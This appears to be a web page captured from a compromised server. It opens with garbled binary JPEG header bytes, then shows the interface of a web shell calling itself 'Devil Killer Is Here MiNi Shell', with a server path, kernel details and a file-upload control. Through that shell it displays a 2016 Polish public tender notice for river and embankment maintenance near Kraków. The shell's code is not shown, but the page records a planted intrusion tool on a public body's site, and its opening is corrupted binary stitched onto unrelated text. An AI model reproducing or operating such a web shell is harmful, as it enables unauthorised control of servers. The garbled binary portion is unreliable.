JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160413/86050-N-2016.html

<p class="kh_header"><b>Kraków: Usługi zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie woj.małopolskie zgodnie z poszczególnymi częściami zamówienia</b><br>
<b>Numer ogłoszenia: 86050 - 2016; data zamieszczenia: 13.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych Inspektorat Rejonowy w Krakowie , ul. Kraszewskiego 36, 30-110 Kraków, woj. małopolskie, tel. 12 628 09 80, faks 12 628 09 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie woj.małopolskie zgodnie z poszczególnymi częściami zamówienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część zamówienia nr 1
1.Konserwacja bieżąca na rzece Serafa w km 0+000 - 3+652, tj. 3,652 km, uregulowany w m. Brzegi i Kokotów, gm. Wieliczka, pow. Wieliczka
Zakres prac :
mechaniczne koszenie skarp rzeki (kosiarka bijakowa, w miejscach trudno dostępnych dokoszenie ręcznie)       
ręczne ścinanie i karczowanie krzaków (pozyskany materiał należy  zagospodarować we  własnym zakresie)
usunięcie roślinności korzeniącej się w dnie - hakowanie przy zarośnięciu lustra wody do 60%
udrożnienie cieku z nanosu, przetamowań i śmieci  
wykonanie wykopów oraz przekopów koparkami podsiębiernymi o poj. łyżki    0,60m3
uzupełnienie ubytków narzutem kamiennym
plantowanie skarp
obsiew skarp (uzupełnienie)

Prace należy prowadzić z uwzględnieniem warunków podanych w decyzji RDOŚ (w załączeniu).Przed przystąpieniem  do prac należy skontrolować teren pod kątem występowania roślin oraz zwierząt objętych ochrona gatunkową. 
Kontroli winien dokonać specjalista przyrodnik z doświadczeniem w pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich.
W związku z powyższym przed przystąpieniem do prac; należy sporządzić notatkę z rozpoznania terenu przez przyrodnika i przekazać ją do Inspektoratu Rejonowego w Krakowie.
2. Utrzymanie koryta  rzeki Serafa w 3+652- 6+080 odc. uregulowany i    6+080-7+248 i  7+712-8+850 - odc. nieuregulowany Kraków - Bieżanów  ,  gm. Kraków , 
pow. Kraków

Zakres prac :
wykoszenie z wygrabieniem porostów traw ze skarp 
ścinanie odrostów od faszyny  
odwóz skoszonych porostów i zakrzaczeń we własnym zakresie poza obręb koryta rzeki - miejska kompostownia 
przycięcie zwisów i warg brzegowych przy istniejących kiszkach 
wyzbieranie i wywóz  przetamowań , śmieci i innych odpadów poza obręb pasa rzecznego we własnym zakresie 

UWAGA : NALEŻY PRZEWIDZIEĆ KILKAKROTNE KOSZENIE TERENU W MIARĘ POTRZEB TAK BY ODROST NA WAŁACH I W MIĘDZYWALU NIE MIAŁ WYSOKOŚCI WIĘKSZEJ NIŻ 10cm ( KILKAKROTNE KOSZENIE  ORAZ SPRZĄTANIE TERENU W MIARĘ POTRZEB I INNE ROBOTY UTRZYMANIOWE ) 
WSZYSTKIE PRACE WYKONYWANE BĘDĄ NA BIEŻĄCO W SPOSÓB CIĄGŁY PRZEZ CAŁY OKRES OBOWIĄZYWANIA UMOWY.
Przed przystąpieniem  do prac należy skontrolować teren pod kątem występowania roślin oraz zwierząt objętych ochrona gatunkową. 
Kontroli winien dokonać specjalista przyrodnik z doświadczeniem w pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich.
W związku z powyższym przed przystąpieniem do prac; należy sporządzić notatkę z rozpoznania terenu przez przyrodnika i przekazać ją do Inspektoratu Rejonowego w Krakowie.
3.1 Roboty utrzymaniowe. Konserwacja bieżąca - koszenie wałów; prawy 
i lewy wał  rzeki Serafa w km P=0+000 - 3+250 i L=0+000-2+950, tj. 6,20 km,  
m. Brzegi i Kokotów, gm. Wieliczka, pow. wielicki

Zakres prac :
mechaniczne koszenie skarp i korony wałów (kosiarka bijakowa)
mechaniczne koszenie porostów z międzywala (kosiarka bijakowa)
utrzymanie ładu i porządku na obiekcie (wał, teren międzywala), w tym zbiórka i wywóz wszystkich śmieci, odpadów i traw na wysypisko śmieci

Koszenie powinno być przeprowadzone w takich odstępach czasu aby wysokość trawy przed kolejnym koszeniem nie przekraczała 10cm. Wysokość porostu traw po skoszeniu nie może przekraczać 5-6cm.
Wszystkie prace wykonywane będą na bieżąco w sposób ciągły przez cały okres obowiązywania umowy.
Zabrania się wypalania traw na wałach, terenie międzywala oraz w rejonie wału

3.2.Konserwacja bieżąca - utwardzenie korony wału; prawy i lewy wał  rzeki Serafa w km P=0+000 - 3+250 i L=0+000-2+950, tj. 6,20 km,  m. Brzegi i Kokotów, gm. Wieliczka, pow. wielicki
Zakres prac :
plantowanie mechaniczne powierzchni gruntu rodzimego
wykonanie warstwy nawierzchni z tłucznia rozścielanej mechanicznie o grubości po zagęszczeniu 10cm, szer. 1,80m
uzupełnienie (wyrównanie) korony wału z dostarczonej ziemi
obsianie skarp i korony w ziemi urodzajnej

4. Konserwacja bieżąca na prawym wale rzeki Wisła 
w km wału 90+800 - 96+038 tj. 5,238km w miejscowości Brzegi i Grabie, 
gm. Wieliczka

Zakres prac :
 przyjęto wykoszenie sposobem mechanicznym  na całej długości wału
 mechaniczne wykoszenie skarp i korony wału kosiarką bijakową
utrzymanie ładu i porządku na obiekcie (wał), w tym zbiórka i wywóz wszystkich śmieci i odpadów na wysypisko śmieci
5. Koszenie prawego wału rzeki Wisły w km 79+183-80+703 i 81+193-90+800
Zabłocie-Przewóz Kraków - 11,127 km 
Zakres prac :
mechaniczne i ręczne wykoszenie porostów ze skarp wału kosiarkami bijakowymi - pokos w postaci sieczki pozostawiony na skarpach wału
wyzbieranie i wywóz we własnym zakresie śmieci zalegających miejscowo na skarpach i koronie wału 

Część zamówienia nr 2
1.Utrzymanie koryta rzeki Wilgi w km 3+525-5+520 w m. Kraków , 
gm. Kraków , powiat miasto Kraków - uregulowany

Zakres prac :
Koszenie skarp obustronnie na całej długości L=1995mb  pasem szerokości 4,0m ,wycinka krzaków do 10 lat porastających brzegi rzeki , wydobycie z koryta powalonych przez bobry drzew wraz z zagospodarowaniem przez wykonawcę , zabudowa wyrw za pomocą faszynady z zasypem materiałem ziemnym i późniejszym humusowaniem i obsiewem mieszankami traw , oczyszczenie umocnień ponad lustrem wody z naniesionego mułu i cząstek gruntu - miejscowo . Wyzbieranie naniesionych śmieci i odpadków z ich odwozem . Wykonanie umocnień z narzutu kamiennego luzem w rejonie obiektów mostowych oraz wylotów z kolektorów kanalizacji opadowej . Rozkucie , wydobycie i odwóz gruzu betonowego zalegającego w korycie rzeki . 
UWAGA : NALEŻY PRZEWIDZIEĆ TRZYKROTNE KOSZENIE TERENU W MIARĘ POTRZEB TAK BY ODROST TRAWY NIE MIAŁ WYSOKOŚCI WIĘKSZEJ NIŻ 10cm ( KILKAKROTNE KOSZENIE  ORAZ SPRZĄTANIE TERENU W MIARĘ POTRZEB I INNE ROBOTY UTRZYMANIOWE )  
Prace należy prowadzić z uwzględnieniem warunków podanych w decyzji RDOŚ (w załączeniu).Przed przystąpieniem  do prac należy skontrolować teren pod kątem występowania roślin oraz zwierząt objętych ochrona gatunkową. 
Kontroli winien dokonać specjalista przyrodnik z doświadczeniem w pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich.
W związku z powyższym przed przystąpieniem do prac; należy sporządzić notatkę z rozpoznania terenu przez przyrodnika i przekazać ją do Inspektoratu Rejonowego w Krakowie.
2. Wykoszenie wałów i międzywala rzeki Wilgi w km 0+000-1+240 - wał prawy i 0+000-1+015 - wał lewy w rejonie ulic: Długosza i Kobierzyńska/Rydlówka w Krakowie gm. Kraków 
pow. Kraków  rozmiar :2,255 km

Zakres prac:
Wykoszenie porostów traw z korony i skarp wałów oraz międzywala lewego i prawego  
UWAGA: porost należy skosić do postaci sieczki z pozostawieniem na miejscu , w przypadku innej postaci wykoszonego porostu należy go wywieźć z terenu robót na własny koszt .POROST NALEŻY SKOSIĆ DO LUSTRA WODY. UWAGA: BRZEGI RZEKI SĄ UMOCNIONE NARZUTEM KAMIENNYM I KOSZAMI SIATKOWO-KAMIENNYMI.
Wycięcie krzaków o poszyciu gęstym bez karczowania
Wywóz gałęzi i karpiny na odległość do 5 km
Wyzbieranie śmieci z międzywala i wałów wraz z wywozem
Podsiew terenu w miejscach pozbawionych darniny ( kretowiny , wydeptanie ścieżek i dróg komunikacyjnych) 

Część zamówienia nr 3
1.Konserwacja bieżąca na potoku Zabawka w km 0+000 - 1+200, tj. 1,20 km, uregulowany w m. Brzegi i Kokotów, gm. Wieliczka, pow. wielicki

Zakres prac:
wycięcie  zakrzaczeń ze skarp potoku po obu stronach, 
pozyskany materiał  należy zagospodarować we własnym zakresie
wykoszenie porostów ze skarp potoku                                                                                                                                                     
udrożnienie cieku z nanosu, śmieci i przetamowań  

Prace należy prowadzić z uwzględnieniem warunków podanych w decyzji RDOŚ (w załączeniu).Przed przystąpieniem  do prac należy skontrolować teren pod kątem występowania roślin oraz zwierząt objętych ochrona gatunkową. 
Kontroli winien dokonać specjalista przyrodnik z doświadczeniem w pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich.
W związku z powyższym przed przystąpieniem do prac; należy sporządzić notatkę z rozpoznania terenu przez przyrodnika i przekazać ją do Inspektoratu Rejonowego w Krakowie.
2. Konserwacja bieżąca na potoku Zabawka w km 1+200 - 1+930, tj. 0,730 km, nieuregulowany w m. Kokotów, gm. Wieliczka, pow. Wieliczka
Zakres prac:
ręczne wykoszenie porostów ze skarp potoku z wygrabieniem                                                                                                                                        
udrożnienie cieku z nanosu                                                                                                                                  
usunięcie pojedynczych zatorów i przetamowań z gałęzi i drzew zwalonych przez bobry

Prace należy prowadzić z uwzględnieniem warunków podanych w decyzji RDOŚ (w załączeniu).Przed przystąpieniem  do prac należy skontrolować teren pod kątem występowania roślin oraz zwierząt objętych ochrona gatunkową. 
Kontroli winien dokonać specjalista przyrodnik z doświadczeniem w pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich.
W związku z powyższym przed przystąpieniem do prac; należy sporządzić notatkę z rozpoznania terenu przez przyrodnika i przekazać ją do Inspektoratu Rejonowego w Krakowie.
3. Roboty utrzymaniowe. Konserwacja bieżąca na prawym i lewym wale  potoku Zabawka w km P=0+000 - 1+211 i L=0+000-1+139, tj. 2,35 km,  
m. Brzegi i Kokotów, gm. Wieliczka, pow. wielicki
Zakres prac:
mechaniczne koszenie skarp i korony wałów (kosiarka bijakowa)
mechaniczne koszenie porostów z międzywala (kosiarka bijakowa)
ścinanie drzew piłą mechaniczną (zagospodarowanie drzew we własnym zakresie, spisać przez ornitologa protokół o braku występowania miejsc lęgowych)
utrzymanie ładu i porządku na obiekcie (wał, teren międzywala), w tym zbiórka i wywóz wszystkich śmieci, odpadów i traw na wysypisko śmieci

Koszenie powinno być przeprowadzone w takich odstępach czasu aby wysokość trawy przed kolejnym koszeniem nie przekraczała 10cm. Wysokość porostu traw po skoszeniu nie może przekraczać 5-6cm.
Wszystkie prace wykonywane będą na bieżąco w sposób ciągły przez cały okres obowiązywania umowy.
Zabrania się wypalania traw na wałach, terenie międzywala oraz w rejonie wału

W dniu planowanej wycinki, przed przystąpieniem  do prac należy dokonać oględzin drzew, pod kątem występowania na nim gniazd lęgowych . oględziny winny być prowadzone przez osobę pełniącą nadzór przyrodniczy-ornitologa.

Część zamówienia nr 4
1.Roboty utrzymaniowe. Konserwacja bieżąca na prawym i lewym wale  rzeki Drwina Długa w km P=0+000 - 1+260 i L=0+000-1+270, tj. 2,53 km,  m. Brzegi, gm. Wieliczka, pow. wielicki 
Zakres prac:
ręczne ścinanie krzaków i podszyć średniej gęstości (zagospodarowanie we własnym zakresie)
ścinanie drzew piłą mechaniczną (zagospodarowanie we własnym zakresie, spisać przez ornitologa protokół o braku występowania miejsc lęgowych)       
mechaniczne koszenie skarp i korony wałów (kosiarka bijakowa)
mechaniczne koszenie porostów z międzywala (kosiarka bijakowa)
wywóz karpiny, gałęzi i drągowiny
wywóz dłużyc
utrzymanie ładu i porządku na obiekcie (wał, teren międzywala), w tym zbiórka i wywóz wszystkich śmieci, odpadów i traw na wysypisko śmieci

Koszenie powinno być przeprowadzone w takich odstępach czasu aby wysokość trawy przed kolejnym koszeniem nie przekraczała 10cm. Wysokość porostu traw po skoszeniu nie może przekraczać 5-6cm.
Wszystkie prace wykonywane będą na bieżąco w sposób ciągły przez cały okres obowiązywania umowy.
Zabrania się wypalania traw na wałach, terenie międzywala oraz w rejonie wału

2.Roboty utrzymaniowe.Koszenie prawego i lewego wału i międzywala rzeki Drwina Długa w m. Kraków - Bieżanów w km : P- 1+260-3+490 L- 1+270-3+724.Długości : wał prawy - 2,23 km , wał lewy - 2,454 km m.Kraków gm.Kraków
Zakres prac:
mechaniczne i ręczne wykoszenie porostów ze skarp i korony wałów  oraz z terenu międzywala mechanicznie - kosiarkami bijakowymi - pokos w postaci sieczki pozostawiony na skarpach wału oraz ręcznie  
ręczne ścinanie krzaków ze skarp wału z zagospodarowaniem we własnym zakresie
wyzbieranie i wywóz we własnym zakresie śmieci zalegających miejscowo wał  i  międzywale oraz wywóz siana z pokosu ręcznego 
podsiew terenu w miejscach pozbawionych darniny ( kretowiny , wydeptanie ścieżek i dróg komunikacyjnych itp. ) 

UWAGA 1: NALEŻY PRZEWIDZIEĆ KILKAKROTNE KOSZENIE TERENU W MIARĘ POTRZEB TAK BY ODROST NA WAŁACH I W MIĘDZYWALU NIE MIAŁ WYSOKOŚCI WIĘKSZEJ NIŻ 10cm ( KILKAKROTNE KOSZENIE  ORAZ SPRZĄTANIE TERENU W MIARĘ POTRZEB I INNE ROBOTY UTRZYMANIOWE )  
UWAGA 2: NALEŻY WYKONAĆ DOKUMENTACJĘ ZDJĘCIOWĄ PRZED PRZYSTĄPIENIEM DO ROBÓT NA OBIEKCIE ORAZ PO ICH ZAKOŃCZENIU. 
WSZYSTKIE PRACE WYKONYWANE BĘDĄ NA BIEŻĄCO W SPOSÓB CIĄGŁY PRZEZ CAŁY OKRES OBOWIĄZYWANIA UMOWY.

Część zamówienia nr 5
1.Roboty utrzymaniowe lewego i prawego wału przeciwpowodziowego rzeki Rudawy (do mostu przy ul. Jesionowej)  m. Kraków, gm. m. Kraków. Wał lewy 0+000-3+650 (rozmiar 3,65 km), wał prawy 0+000-3+629 (rozmiar 3,629 km). Koszenie

Zakres prac:
Wykoszenie porostów ze skarp i korony wału sprzętem mechanicznym
Mechaniczne wykoszenie porostów przy użyciu ciągnika i kosiarki bijakowej z rozdrobnieniem
Wykoszenie porostów ze skarp i korony wału przy użyciu sprzętu ręcznego
Koszenie porostów twardych i gęstych z korony i skarp wału wykaszarkami ręcznymi 
z wygrabienie po ręcznym wykoszeniu  i wywiezieniem 
Podsiewanie mieszanką traw  w miejscach kretowin lub lokalnych zaniżeń korony
Uzupełnienie (wyrównanie korony wału (koleiny)
Uporządkowanie terenu po wykonanych pracach
utrzymanie ładu i porządku na obiekcie (teren międzywala, wały) - w okresie trwania umowy
Koszenie przeprowadzone ma być w takich odstępach czasu aby wysokość trawy przed kolejnym koszeniem nie przekroczyła 10 cm. Wysokość porostu traw po skoszeniu nie może przekraczać 
5-6 cm  
Wszystkie prace wykonywane będą na bieżąco w sposób ciągły przez cały okres obowiązywania umowy
Zabrania się wypalania traw na wałach, terenie międzywala oraz w rejonie wału

2. Roboty utrzymaniowe koryta rzeki Rudawy w km 0+000 do 3+660 (do mostu przy 
ul. Jesionowej)  m. Kraków, gm. m. Kraków - śmieci i przetamowania
Zakres prac : 
Usunięcie przetamowań z koryta rzeki ,wiatrołomów i drzew powalonych przez bobry,  pocięcie drzew, zebranie karpiny, gałęzi, śmieci , załadunek z zagospodarowaniem we własnym zakresie zgodnie z obowiązującymi przepisami. Usuwanie uszkodzonych konarów i gałęzi znajdujących się na drzewie jak i pod drzewem. Prace na bieżąco przez cały okres obowiązywania umowy.
zebranie ręczne do worków wszystkich śmieci  znajdujących się w międzywalu rzeki Rudawy, na lewym i prawym wale. Prace na bieżąco przez cały okres obowiązywania umowy.
wyciągnięcie worków poza murek na koronie wałów , załadunek do kontenera.
wywiezienie kontenera do jednostki utylizującej wg przepisów.
utrzymanie ładu i porządku na obiekcie (rzeka, teren międzywala) - w okresie trwania umowy.
Wszystkie prace wykonywane będą na bieżąco w sposób ciągły przez cały okres obowiązywania umowy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3, 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli:
a.)1.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali :co najmniej 2 usługi polegające na konserwacji rzek lub potoków wraz z koszeniem, odpowiadające swoim rodzajem pracom stanowiącym przedmiot zamówienia/dotyczy części zamówienia Nr 1 / o  łącznej wartości równej lub większej od 200 000,00 zł. ,z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. 
a.)2.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali :co najmniej 1 usługę polegające na konserwacji rzek lub potoków wraz z koszeniem, odpowiadające swoim rodzajem pracom stanowiącym przedmiot zamówienia/dotyczy części zamówienia Nr 2 ,Nr 4,Nr 5 / o wartości   równej lub większej od 50 000,00 zł. ,z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. 
a.)3.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali :co najmniej 1 usługę polegające na konserwacji rzek lub potoków wraz z koszeniem, odpowiadające swoim rodzajem pracom stanowiącym przedmiot zamówienia/dotyczy części zamówienia Nr 3 / o wartości   równej lub większej od 30 000,00 zł. ,z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli 1.wykażą ,że dysponują sprzętem i urządzeniami niezbędnymi  do wykonania zamówienia a w szczególności;  co najmniej 1 kosiarka bijakowa,1 koparkę,1 samochód samowyładowczy lub1 ciągnik ,1 walec  /dotyczy części zamówienia Nr 1/
2.wykażą ,że dysponują sprzętem i urządzeniami niezbędnymi  do wykonania zamówienia a w szczególności;  co najmniej 1 kosiarka bijakowa,1 samochód samowyładowczy lub1 ciągnik  /dotyczy części zamówienia Nr 2,Nr 3,Nr 5/
3.wykażą ,że dysponują sprzętem i urządzeniami niezbędnymi  do wykonania zamówienia a w szczególności;  co najmniej 1 kosiarka bijakowa,  /dotyczy części zamówienia Nr 4/
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże ,że 
1. dysponują  osobami posiadającymi kwalifikacje zawodowe, doświadczenie , wykształcenie i uprawnienia  niezbędne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 (tj. Dz. U. z 2013 r., poz. 1409 z późn. zm.) lub  odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j. Dz.U. z 2013 r. poz.932) do kierowania robotami budowlanymi na stanowisku: kierownika budowy, który musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi w  specjalności konstrukcyjno-budowlanej  w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych. 
W przypadku wykonawców zagranicznych, zamawiający dopuścił 
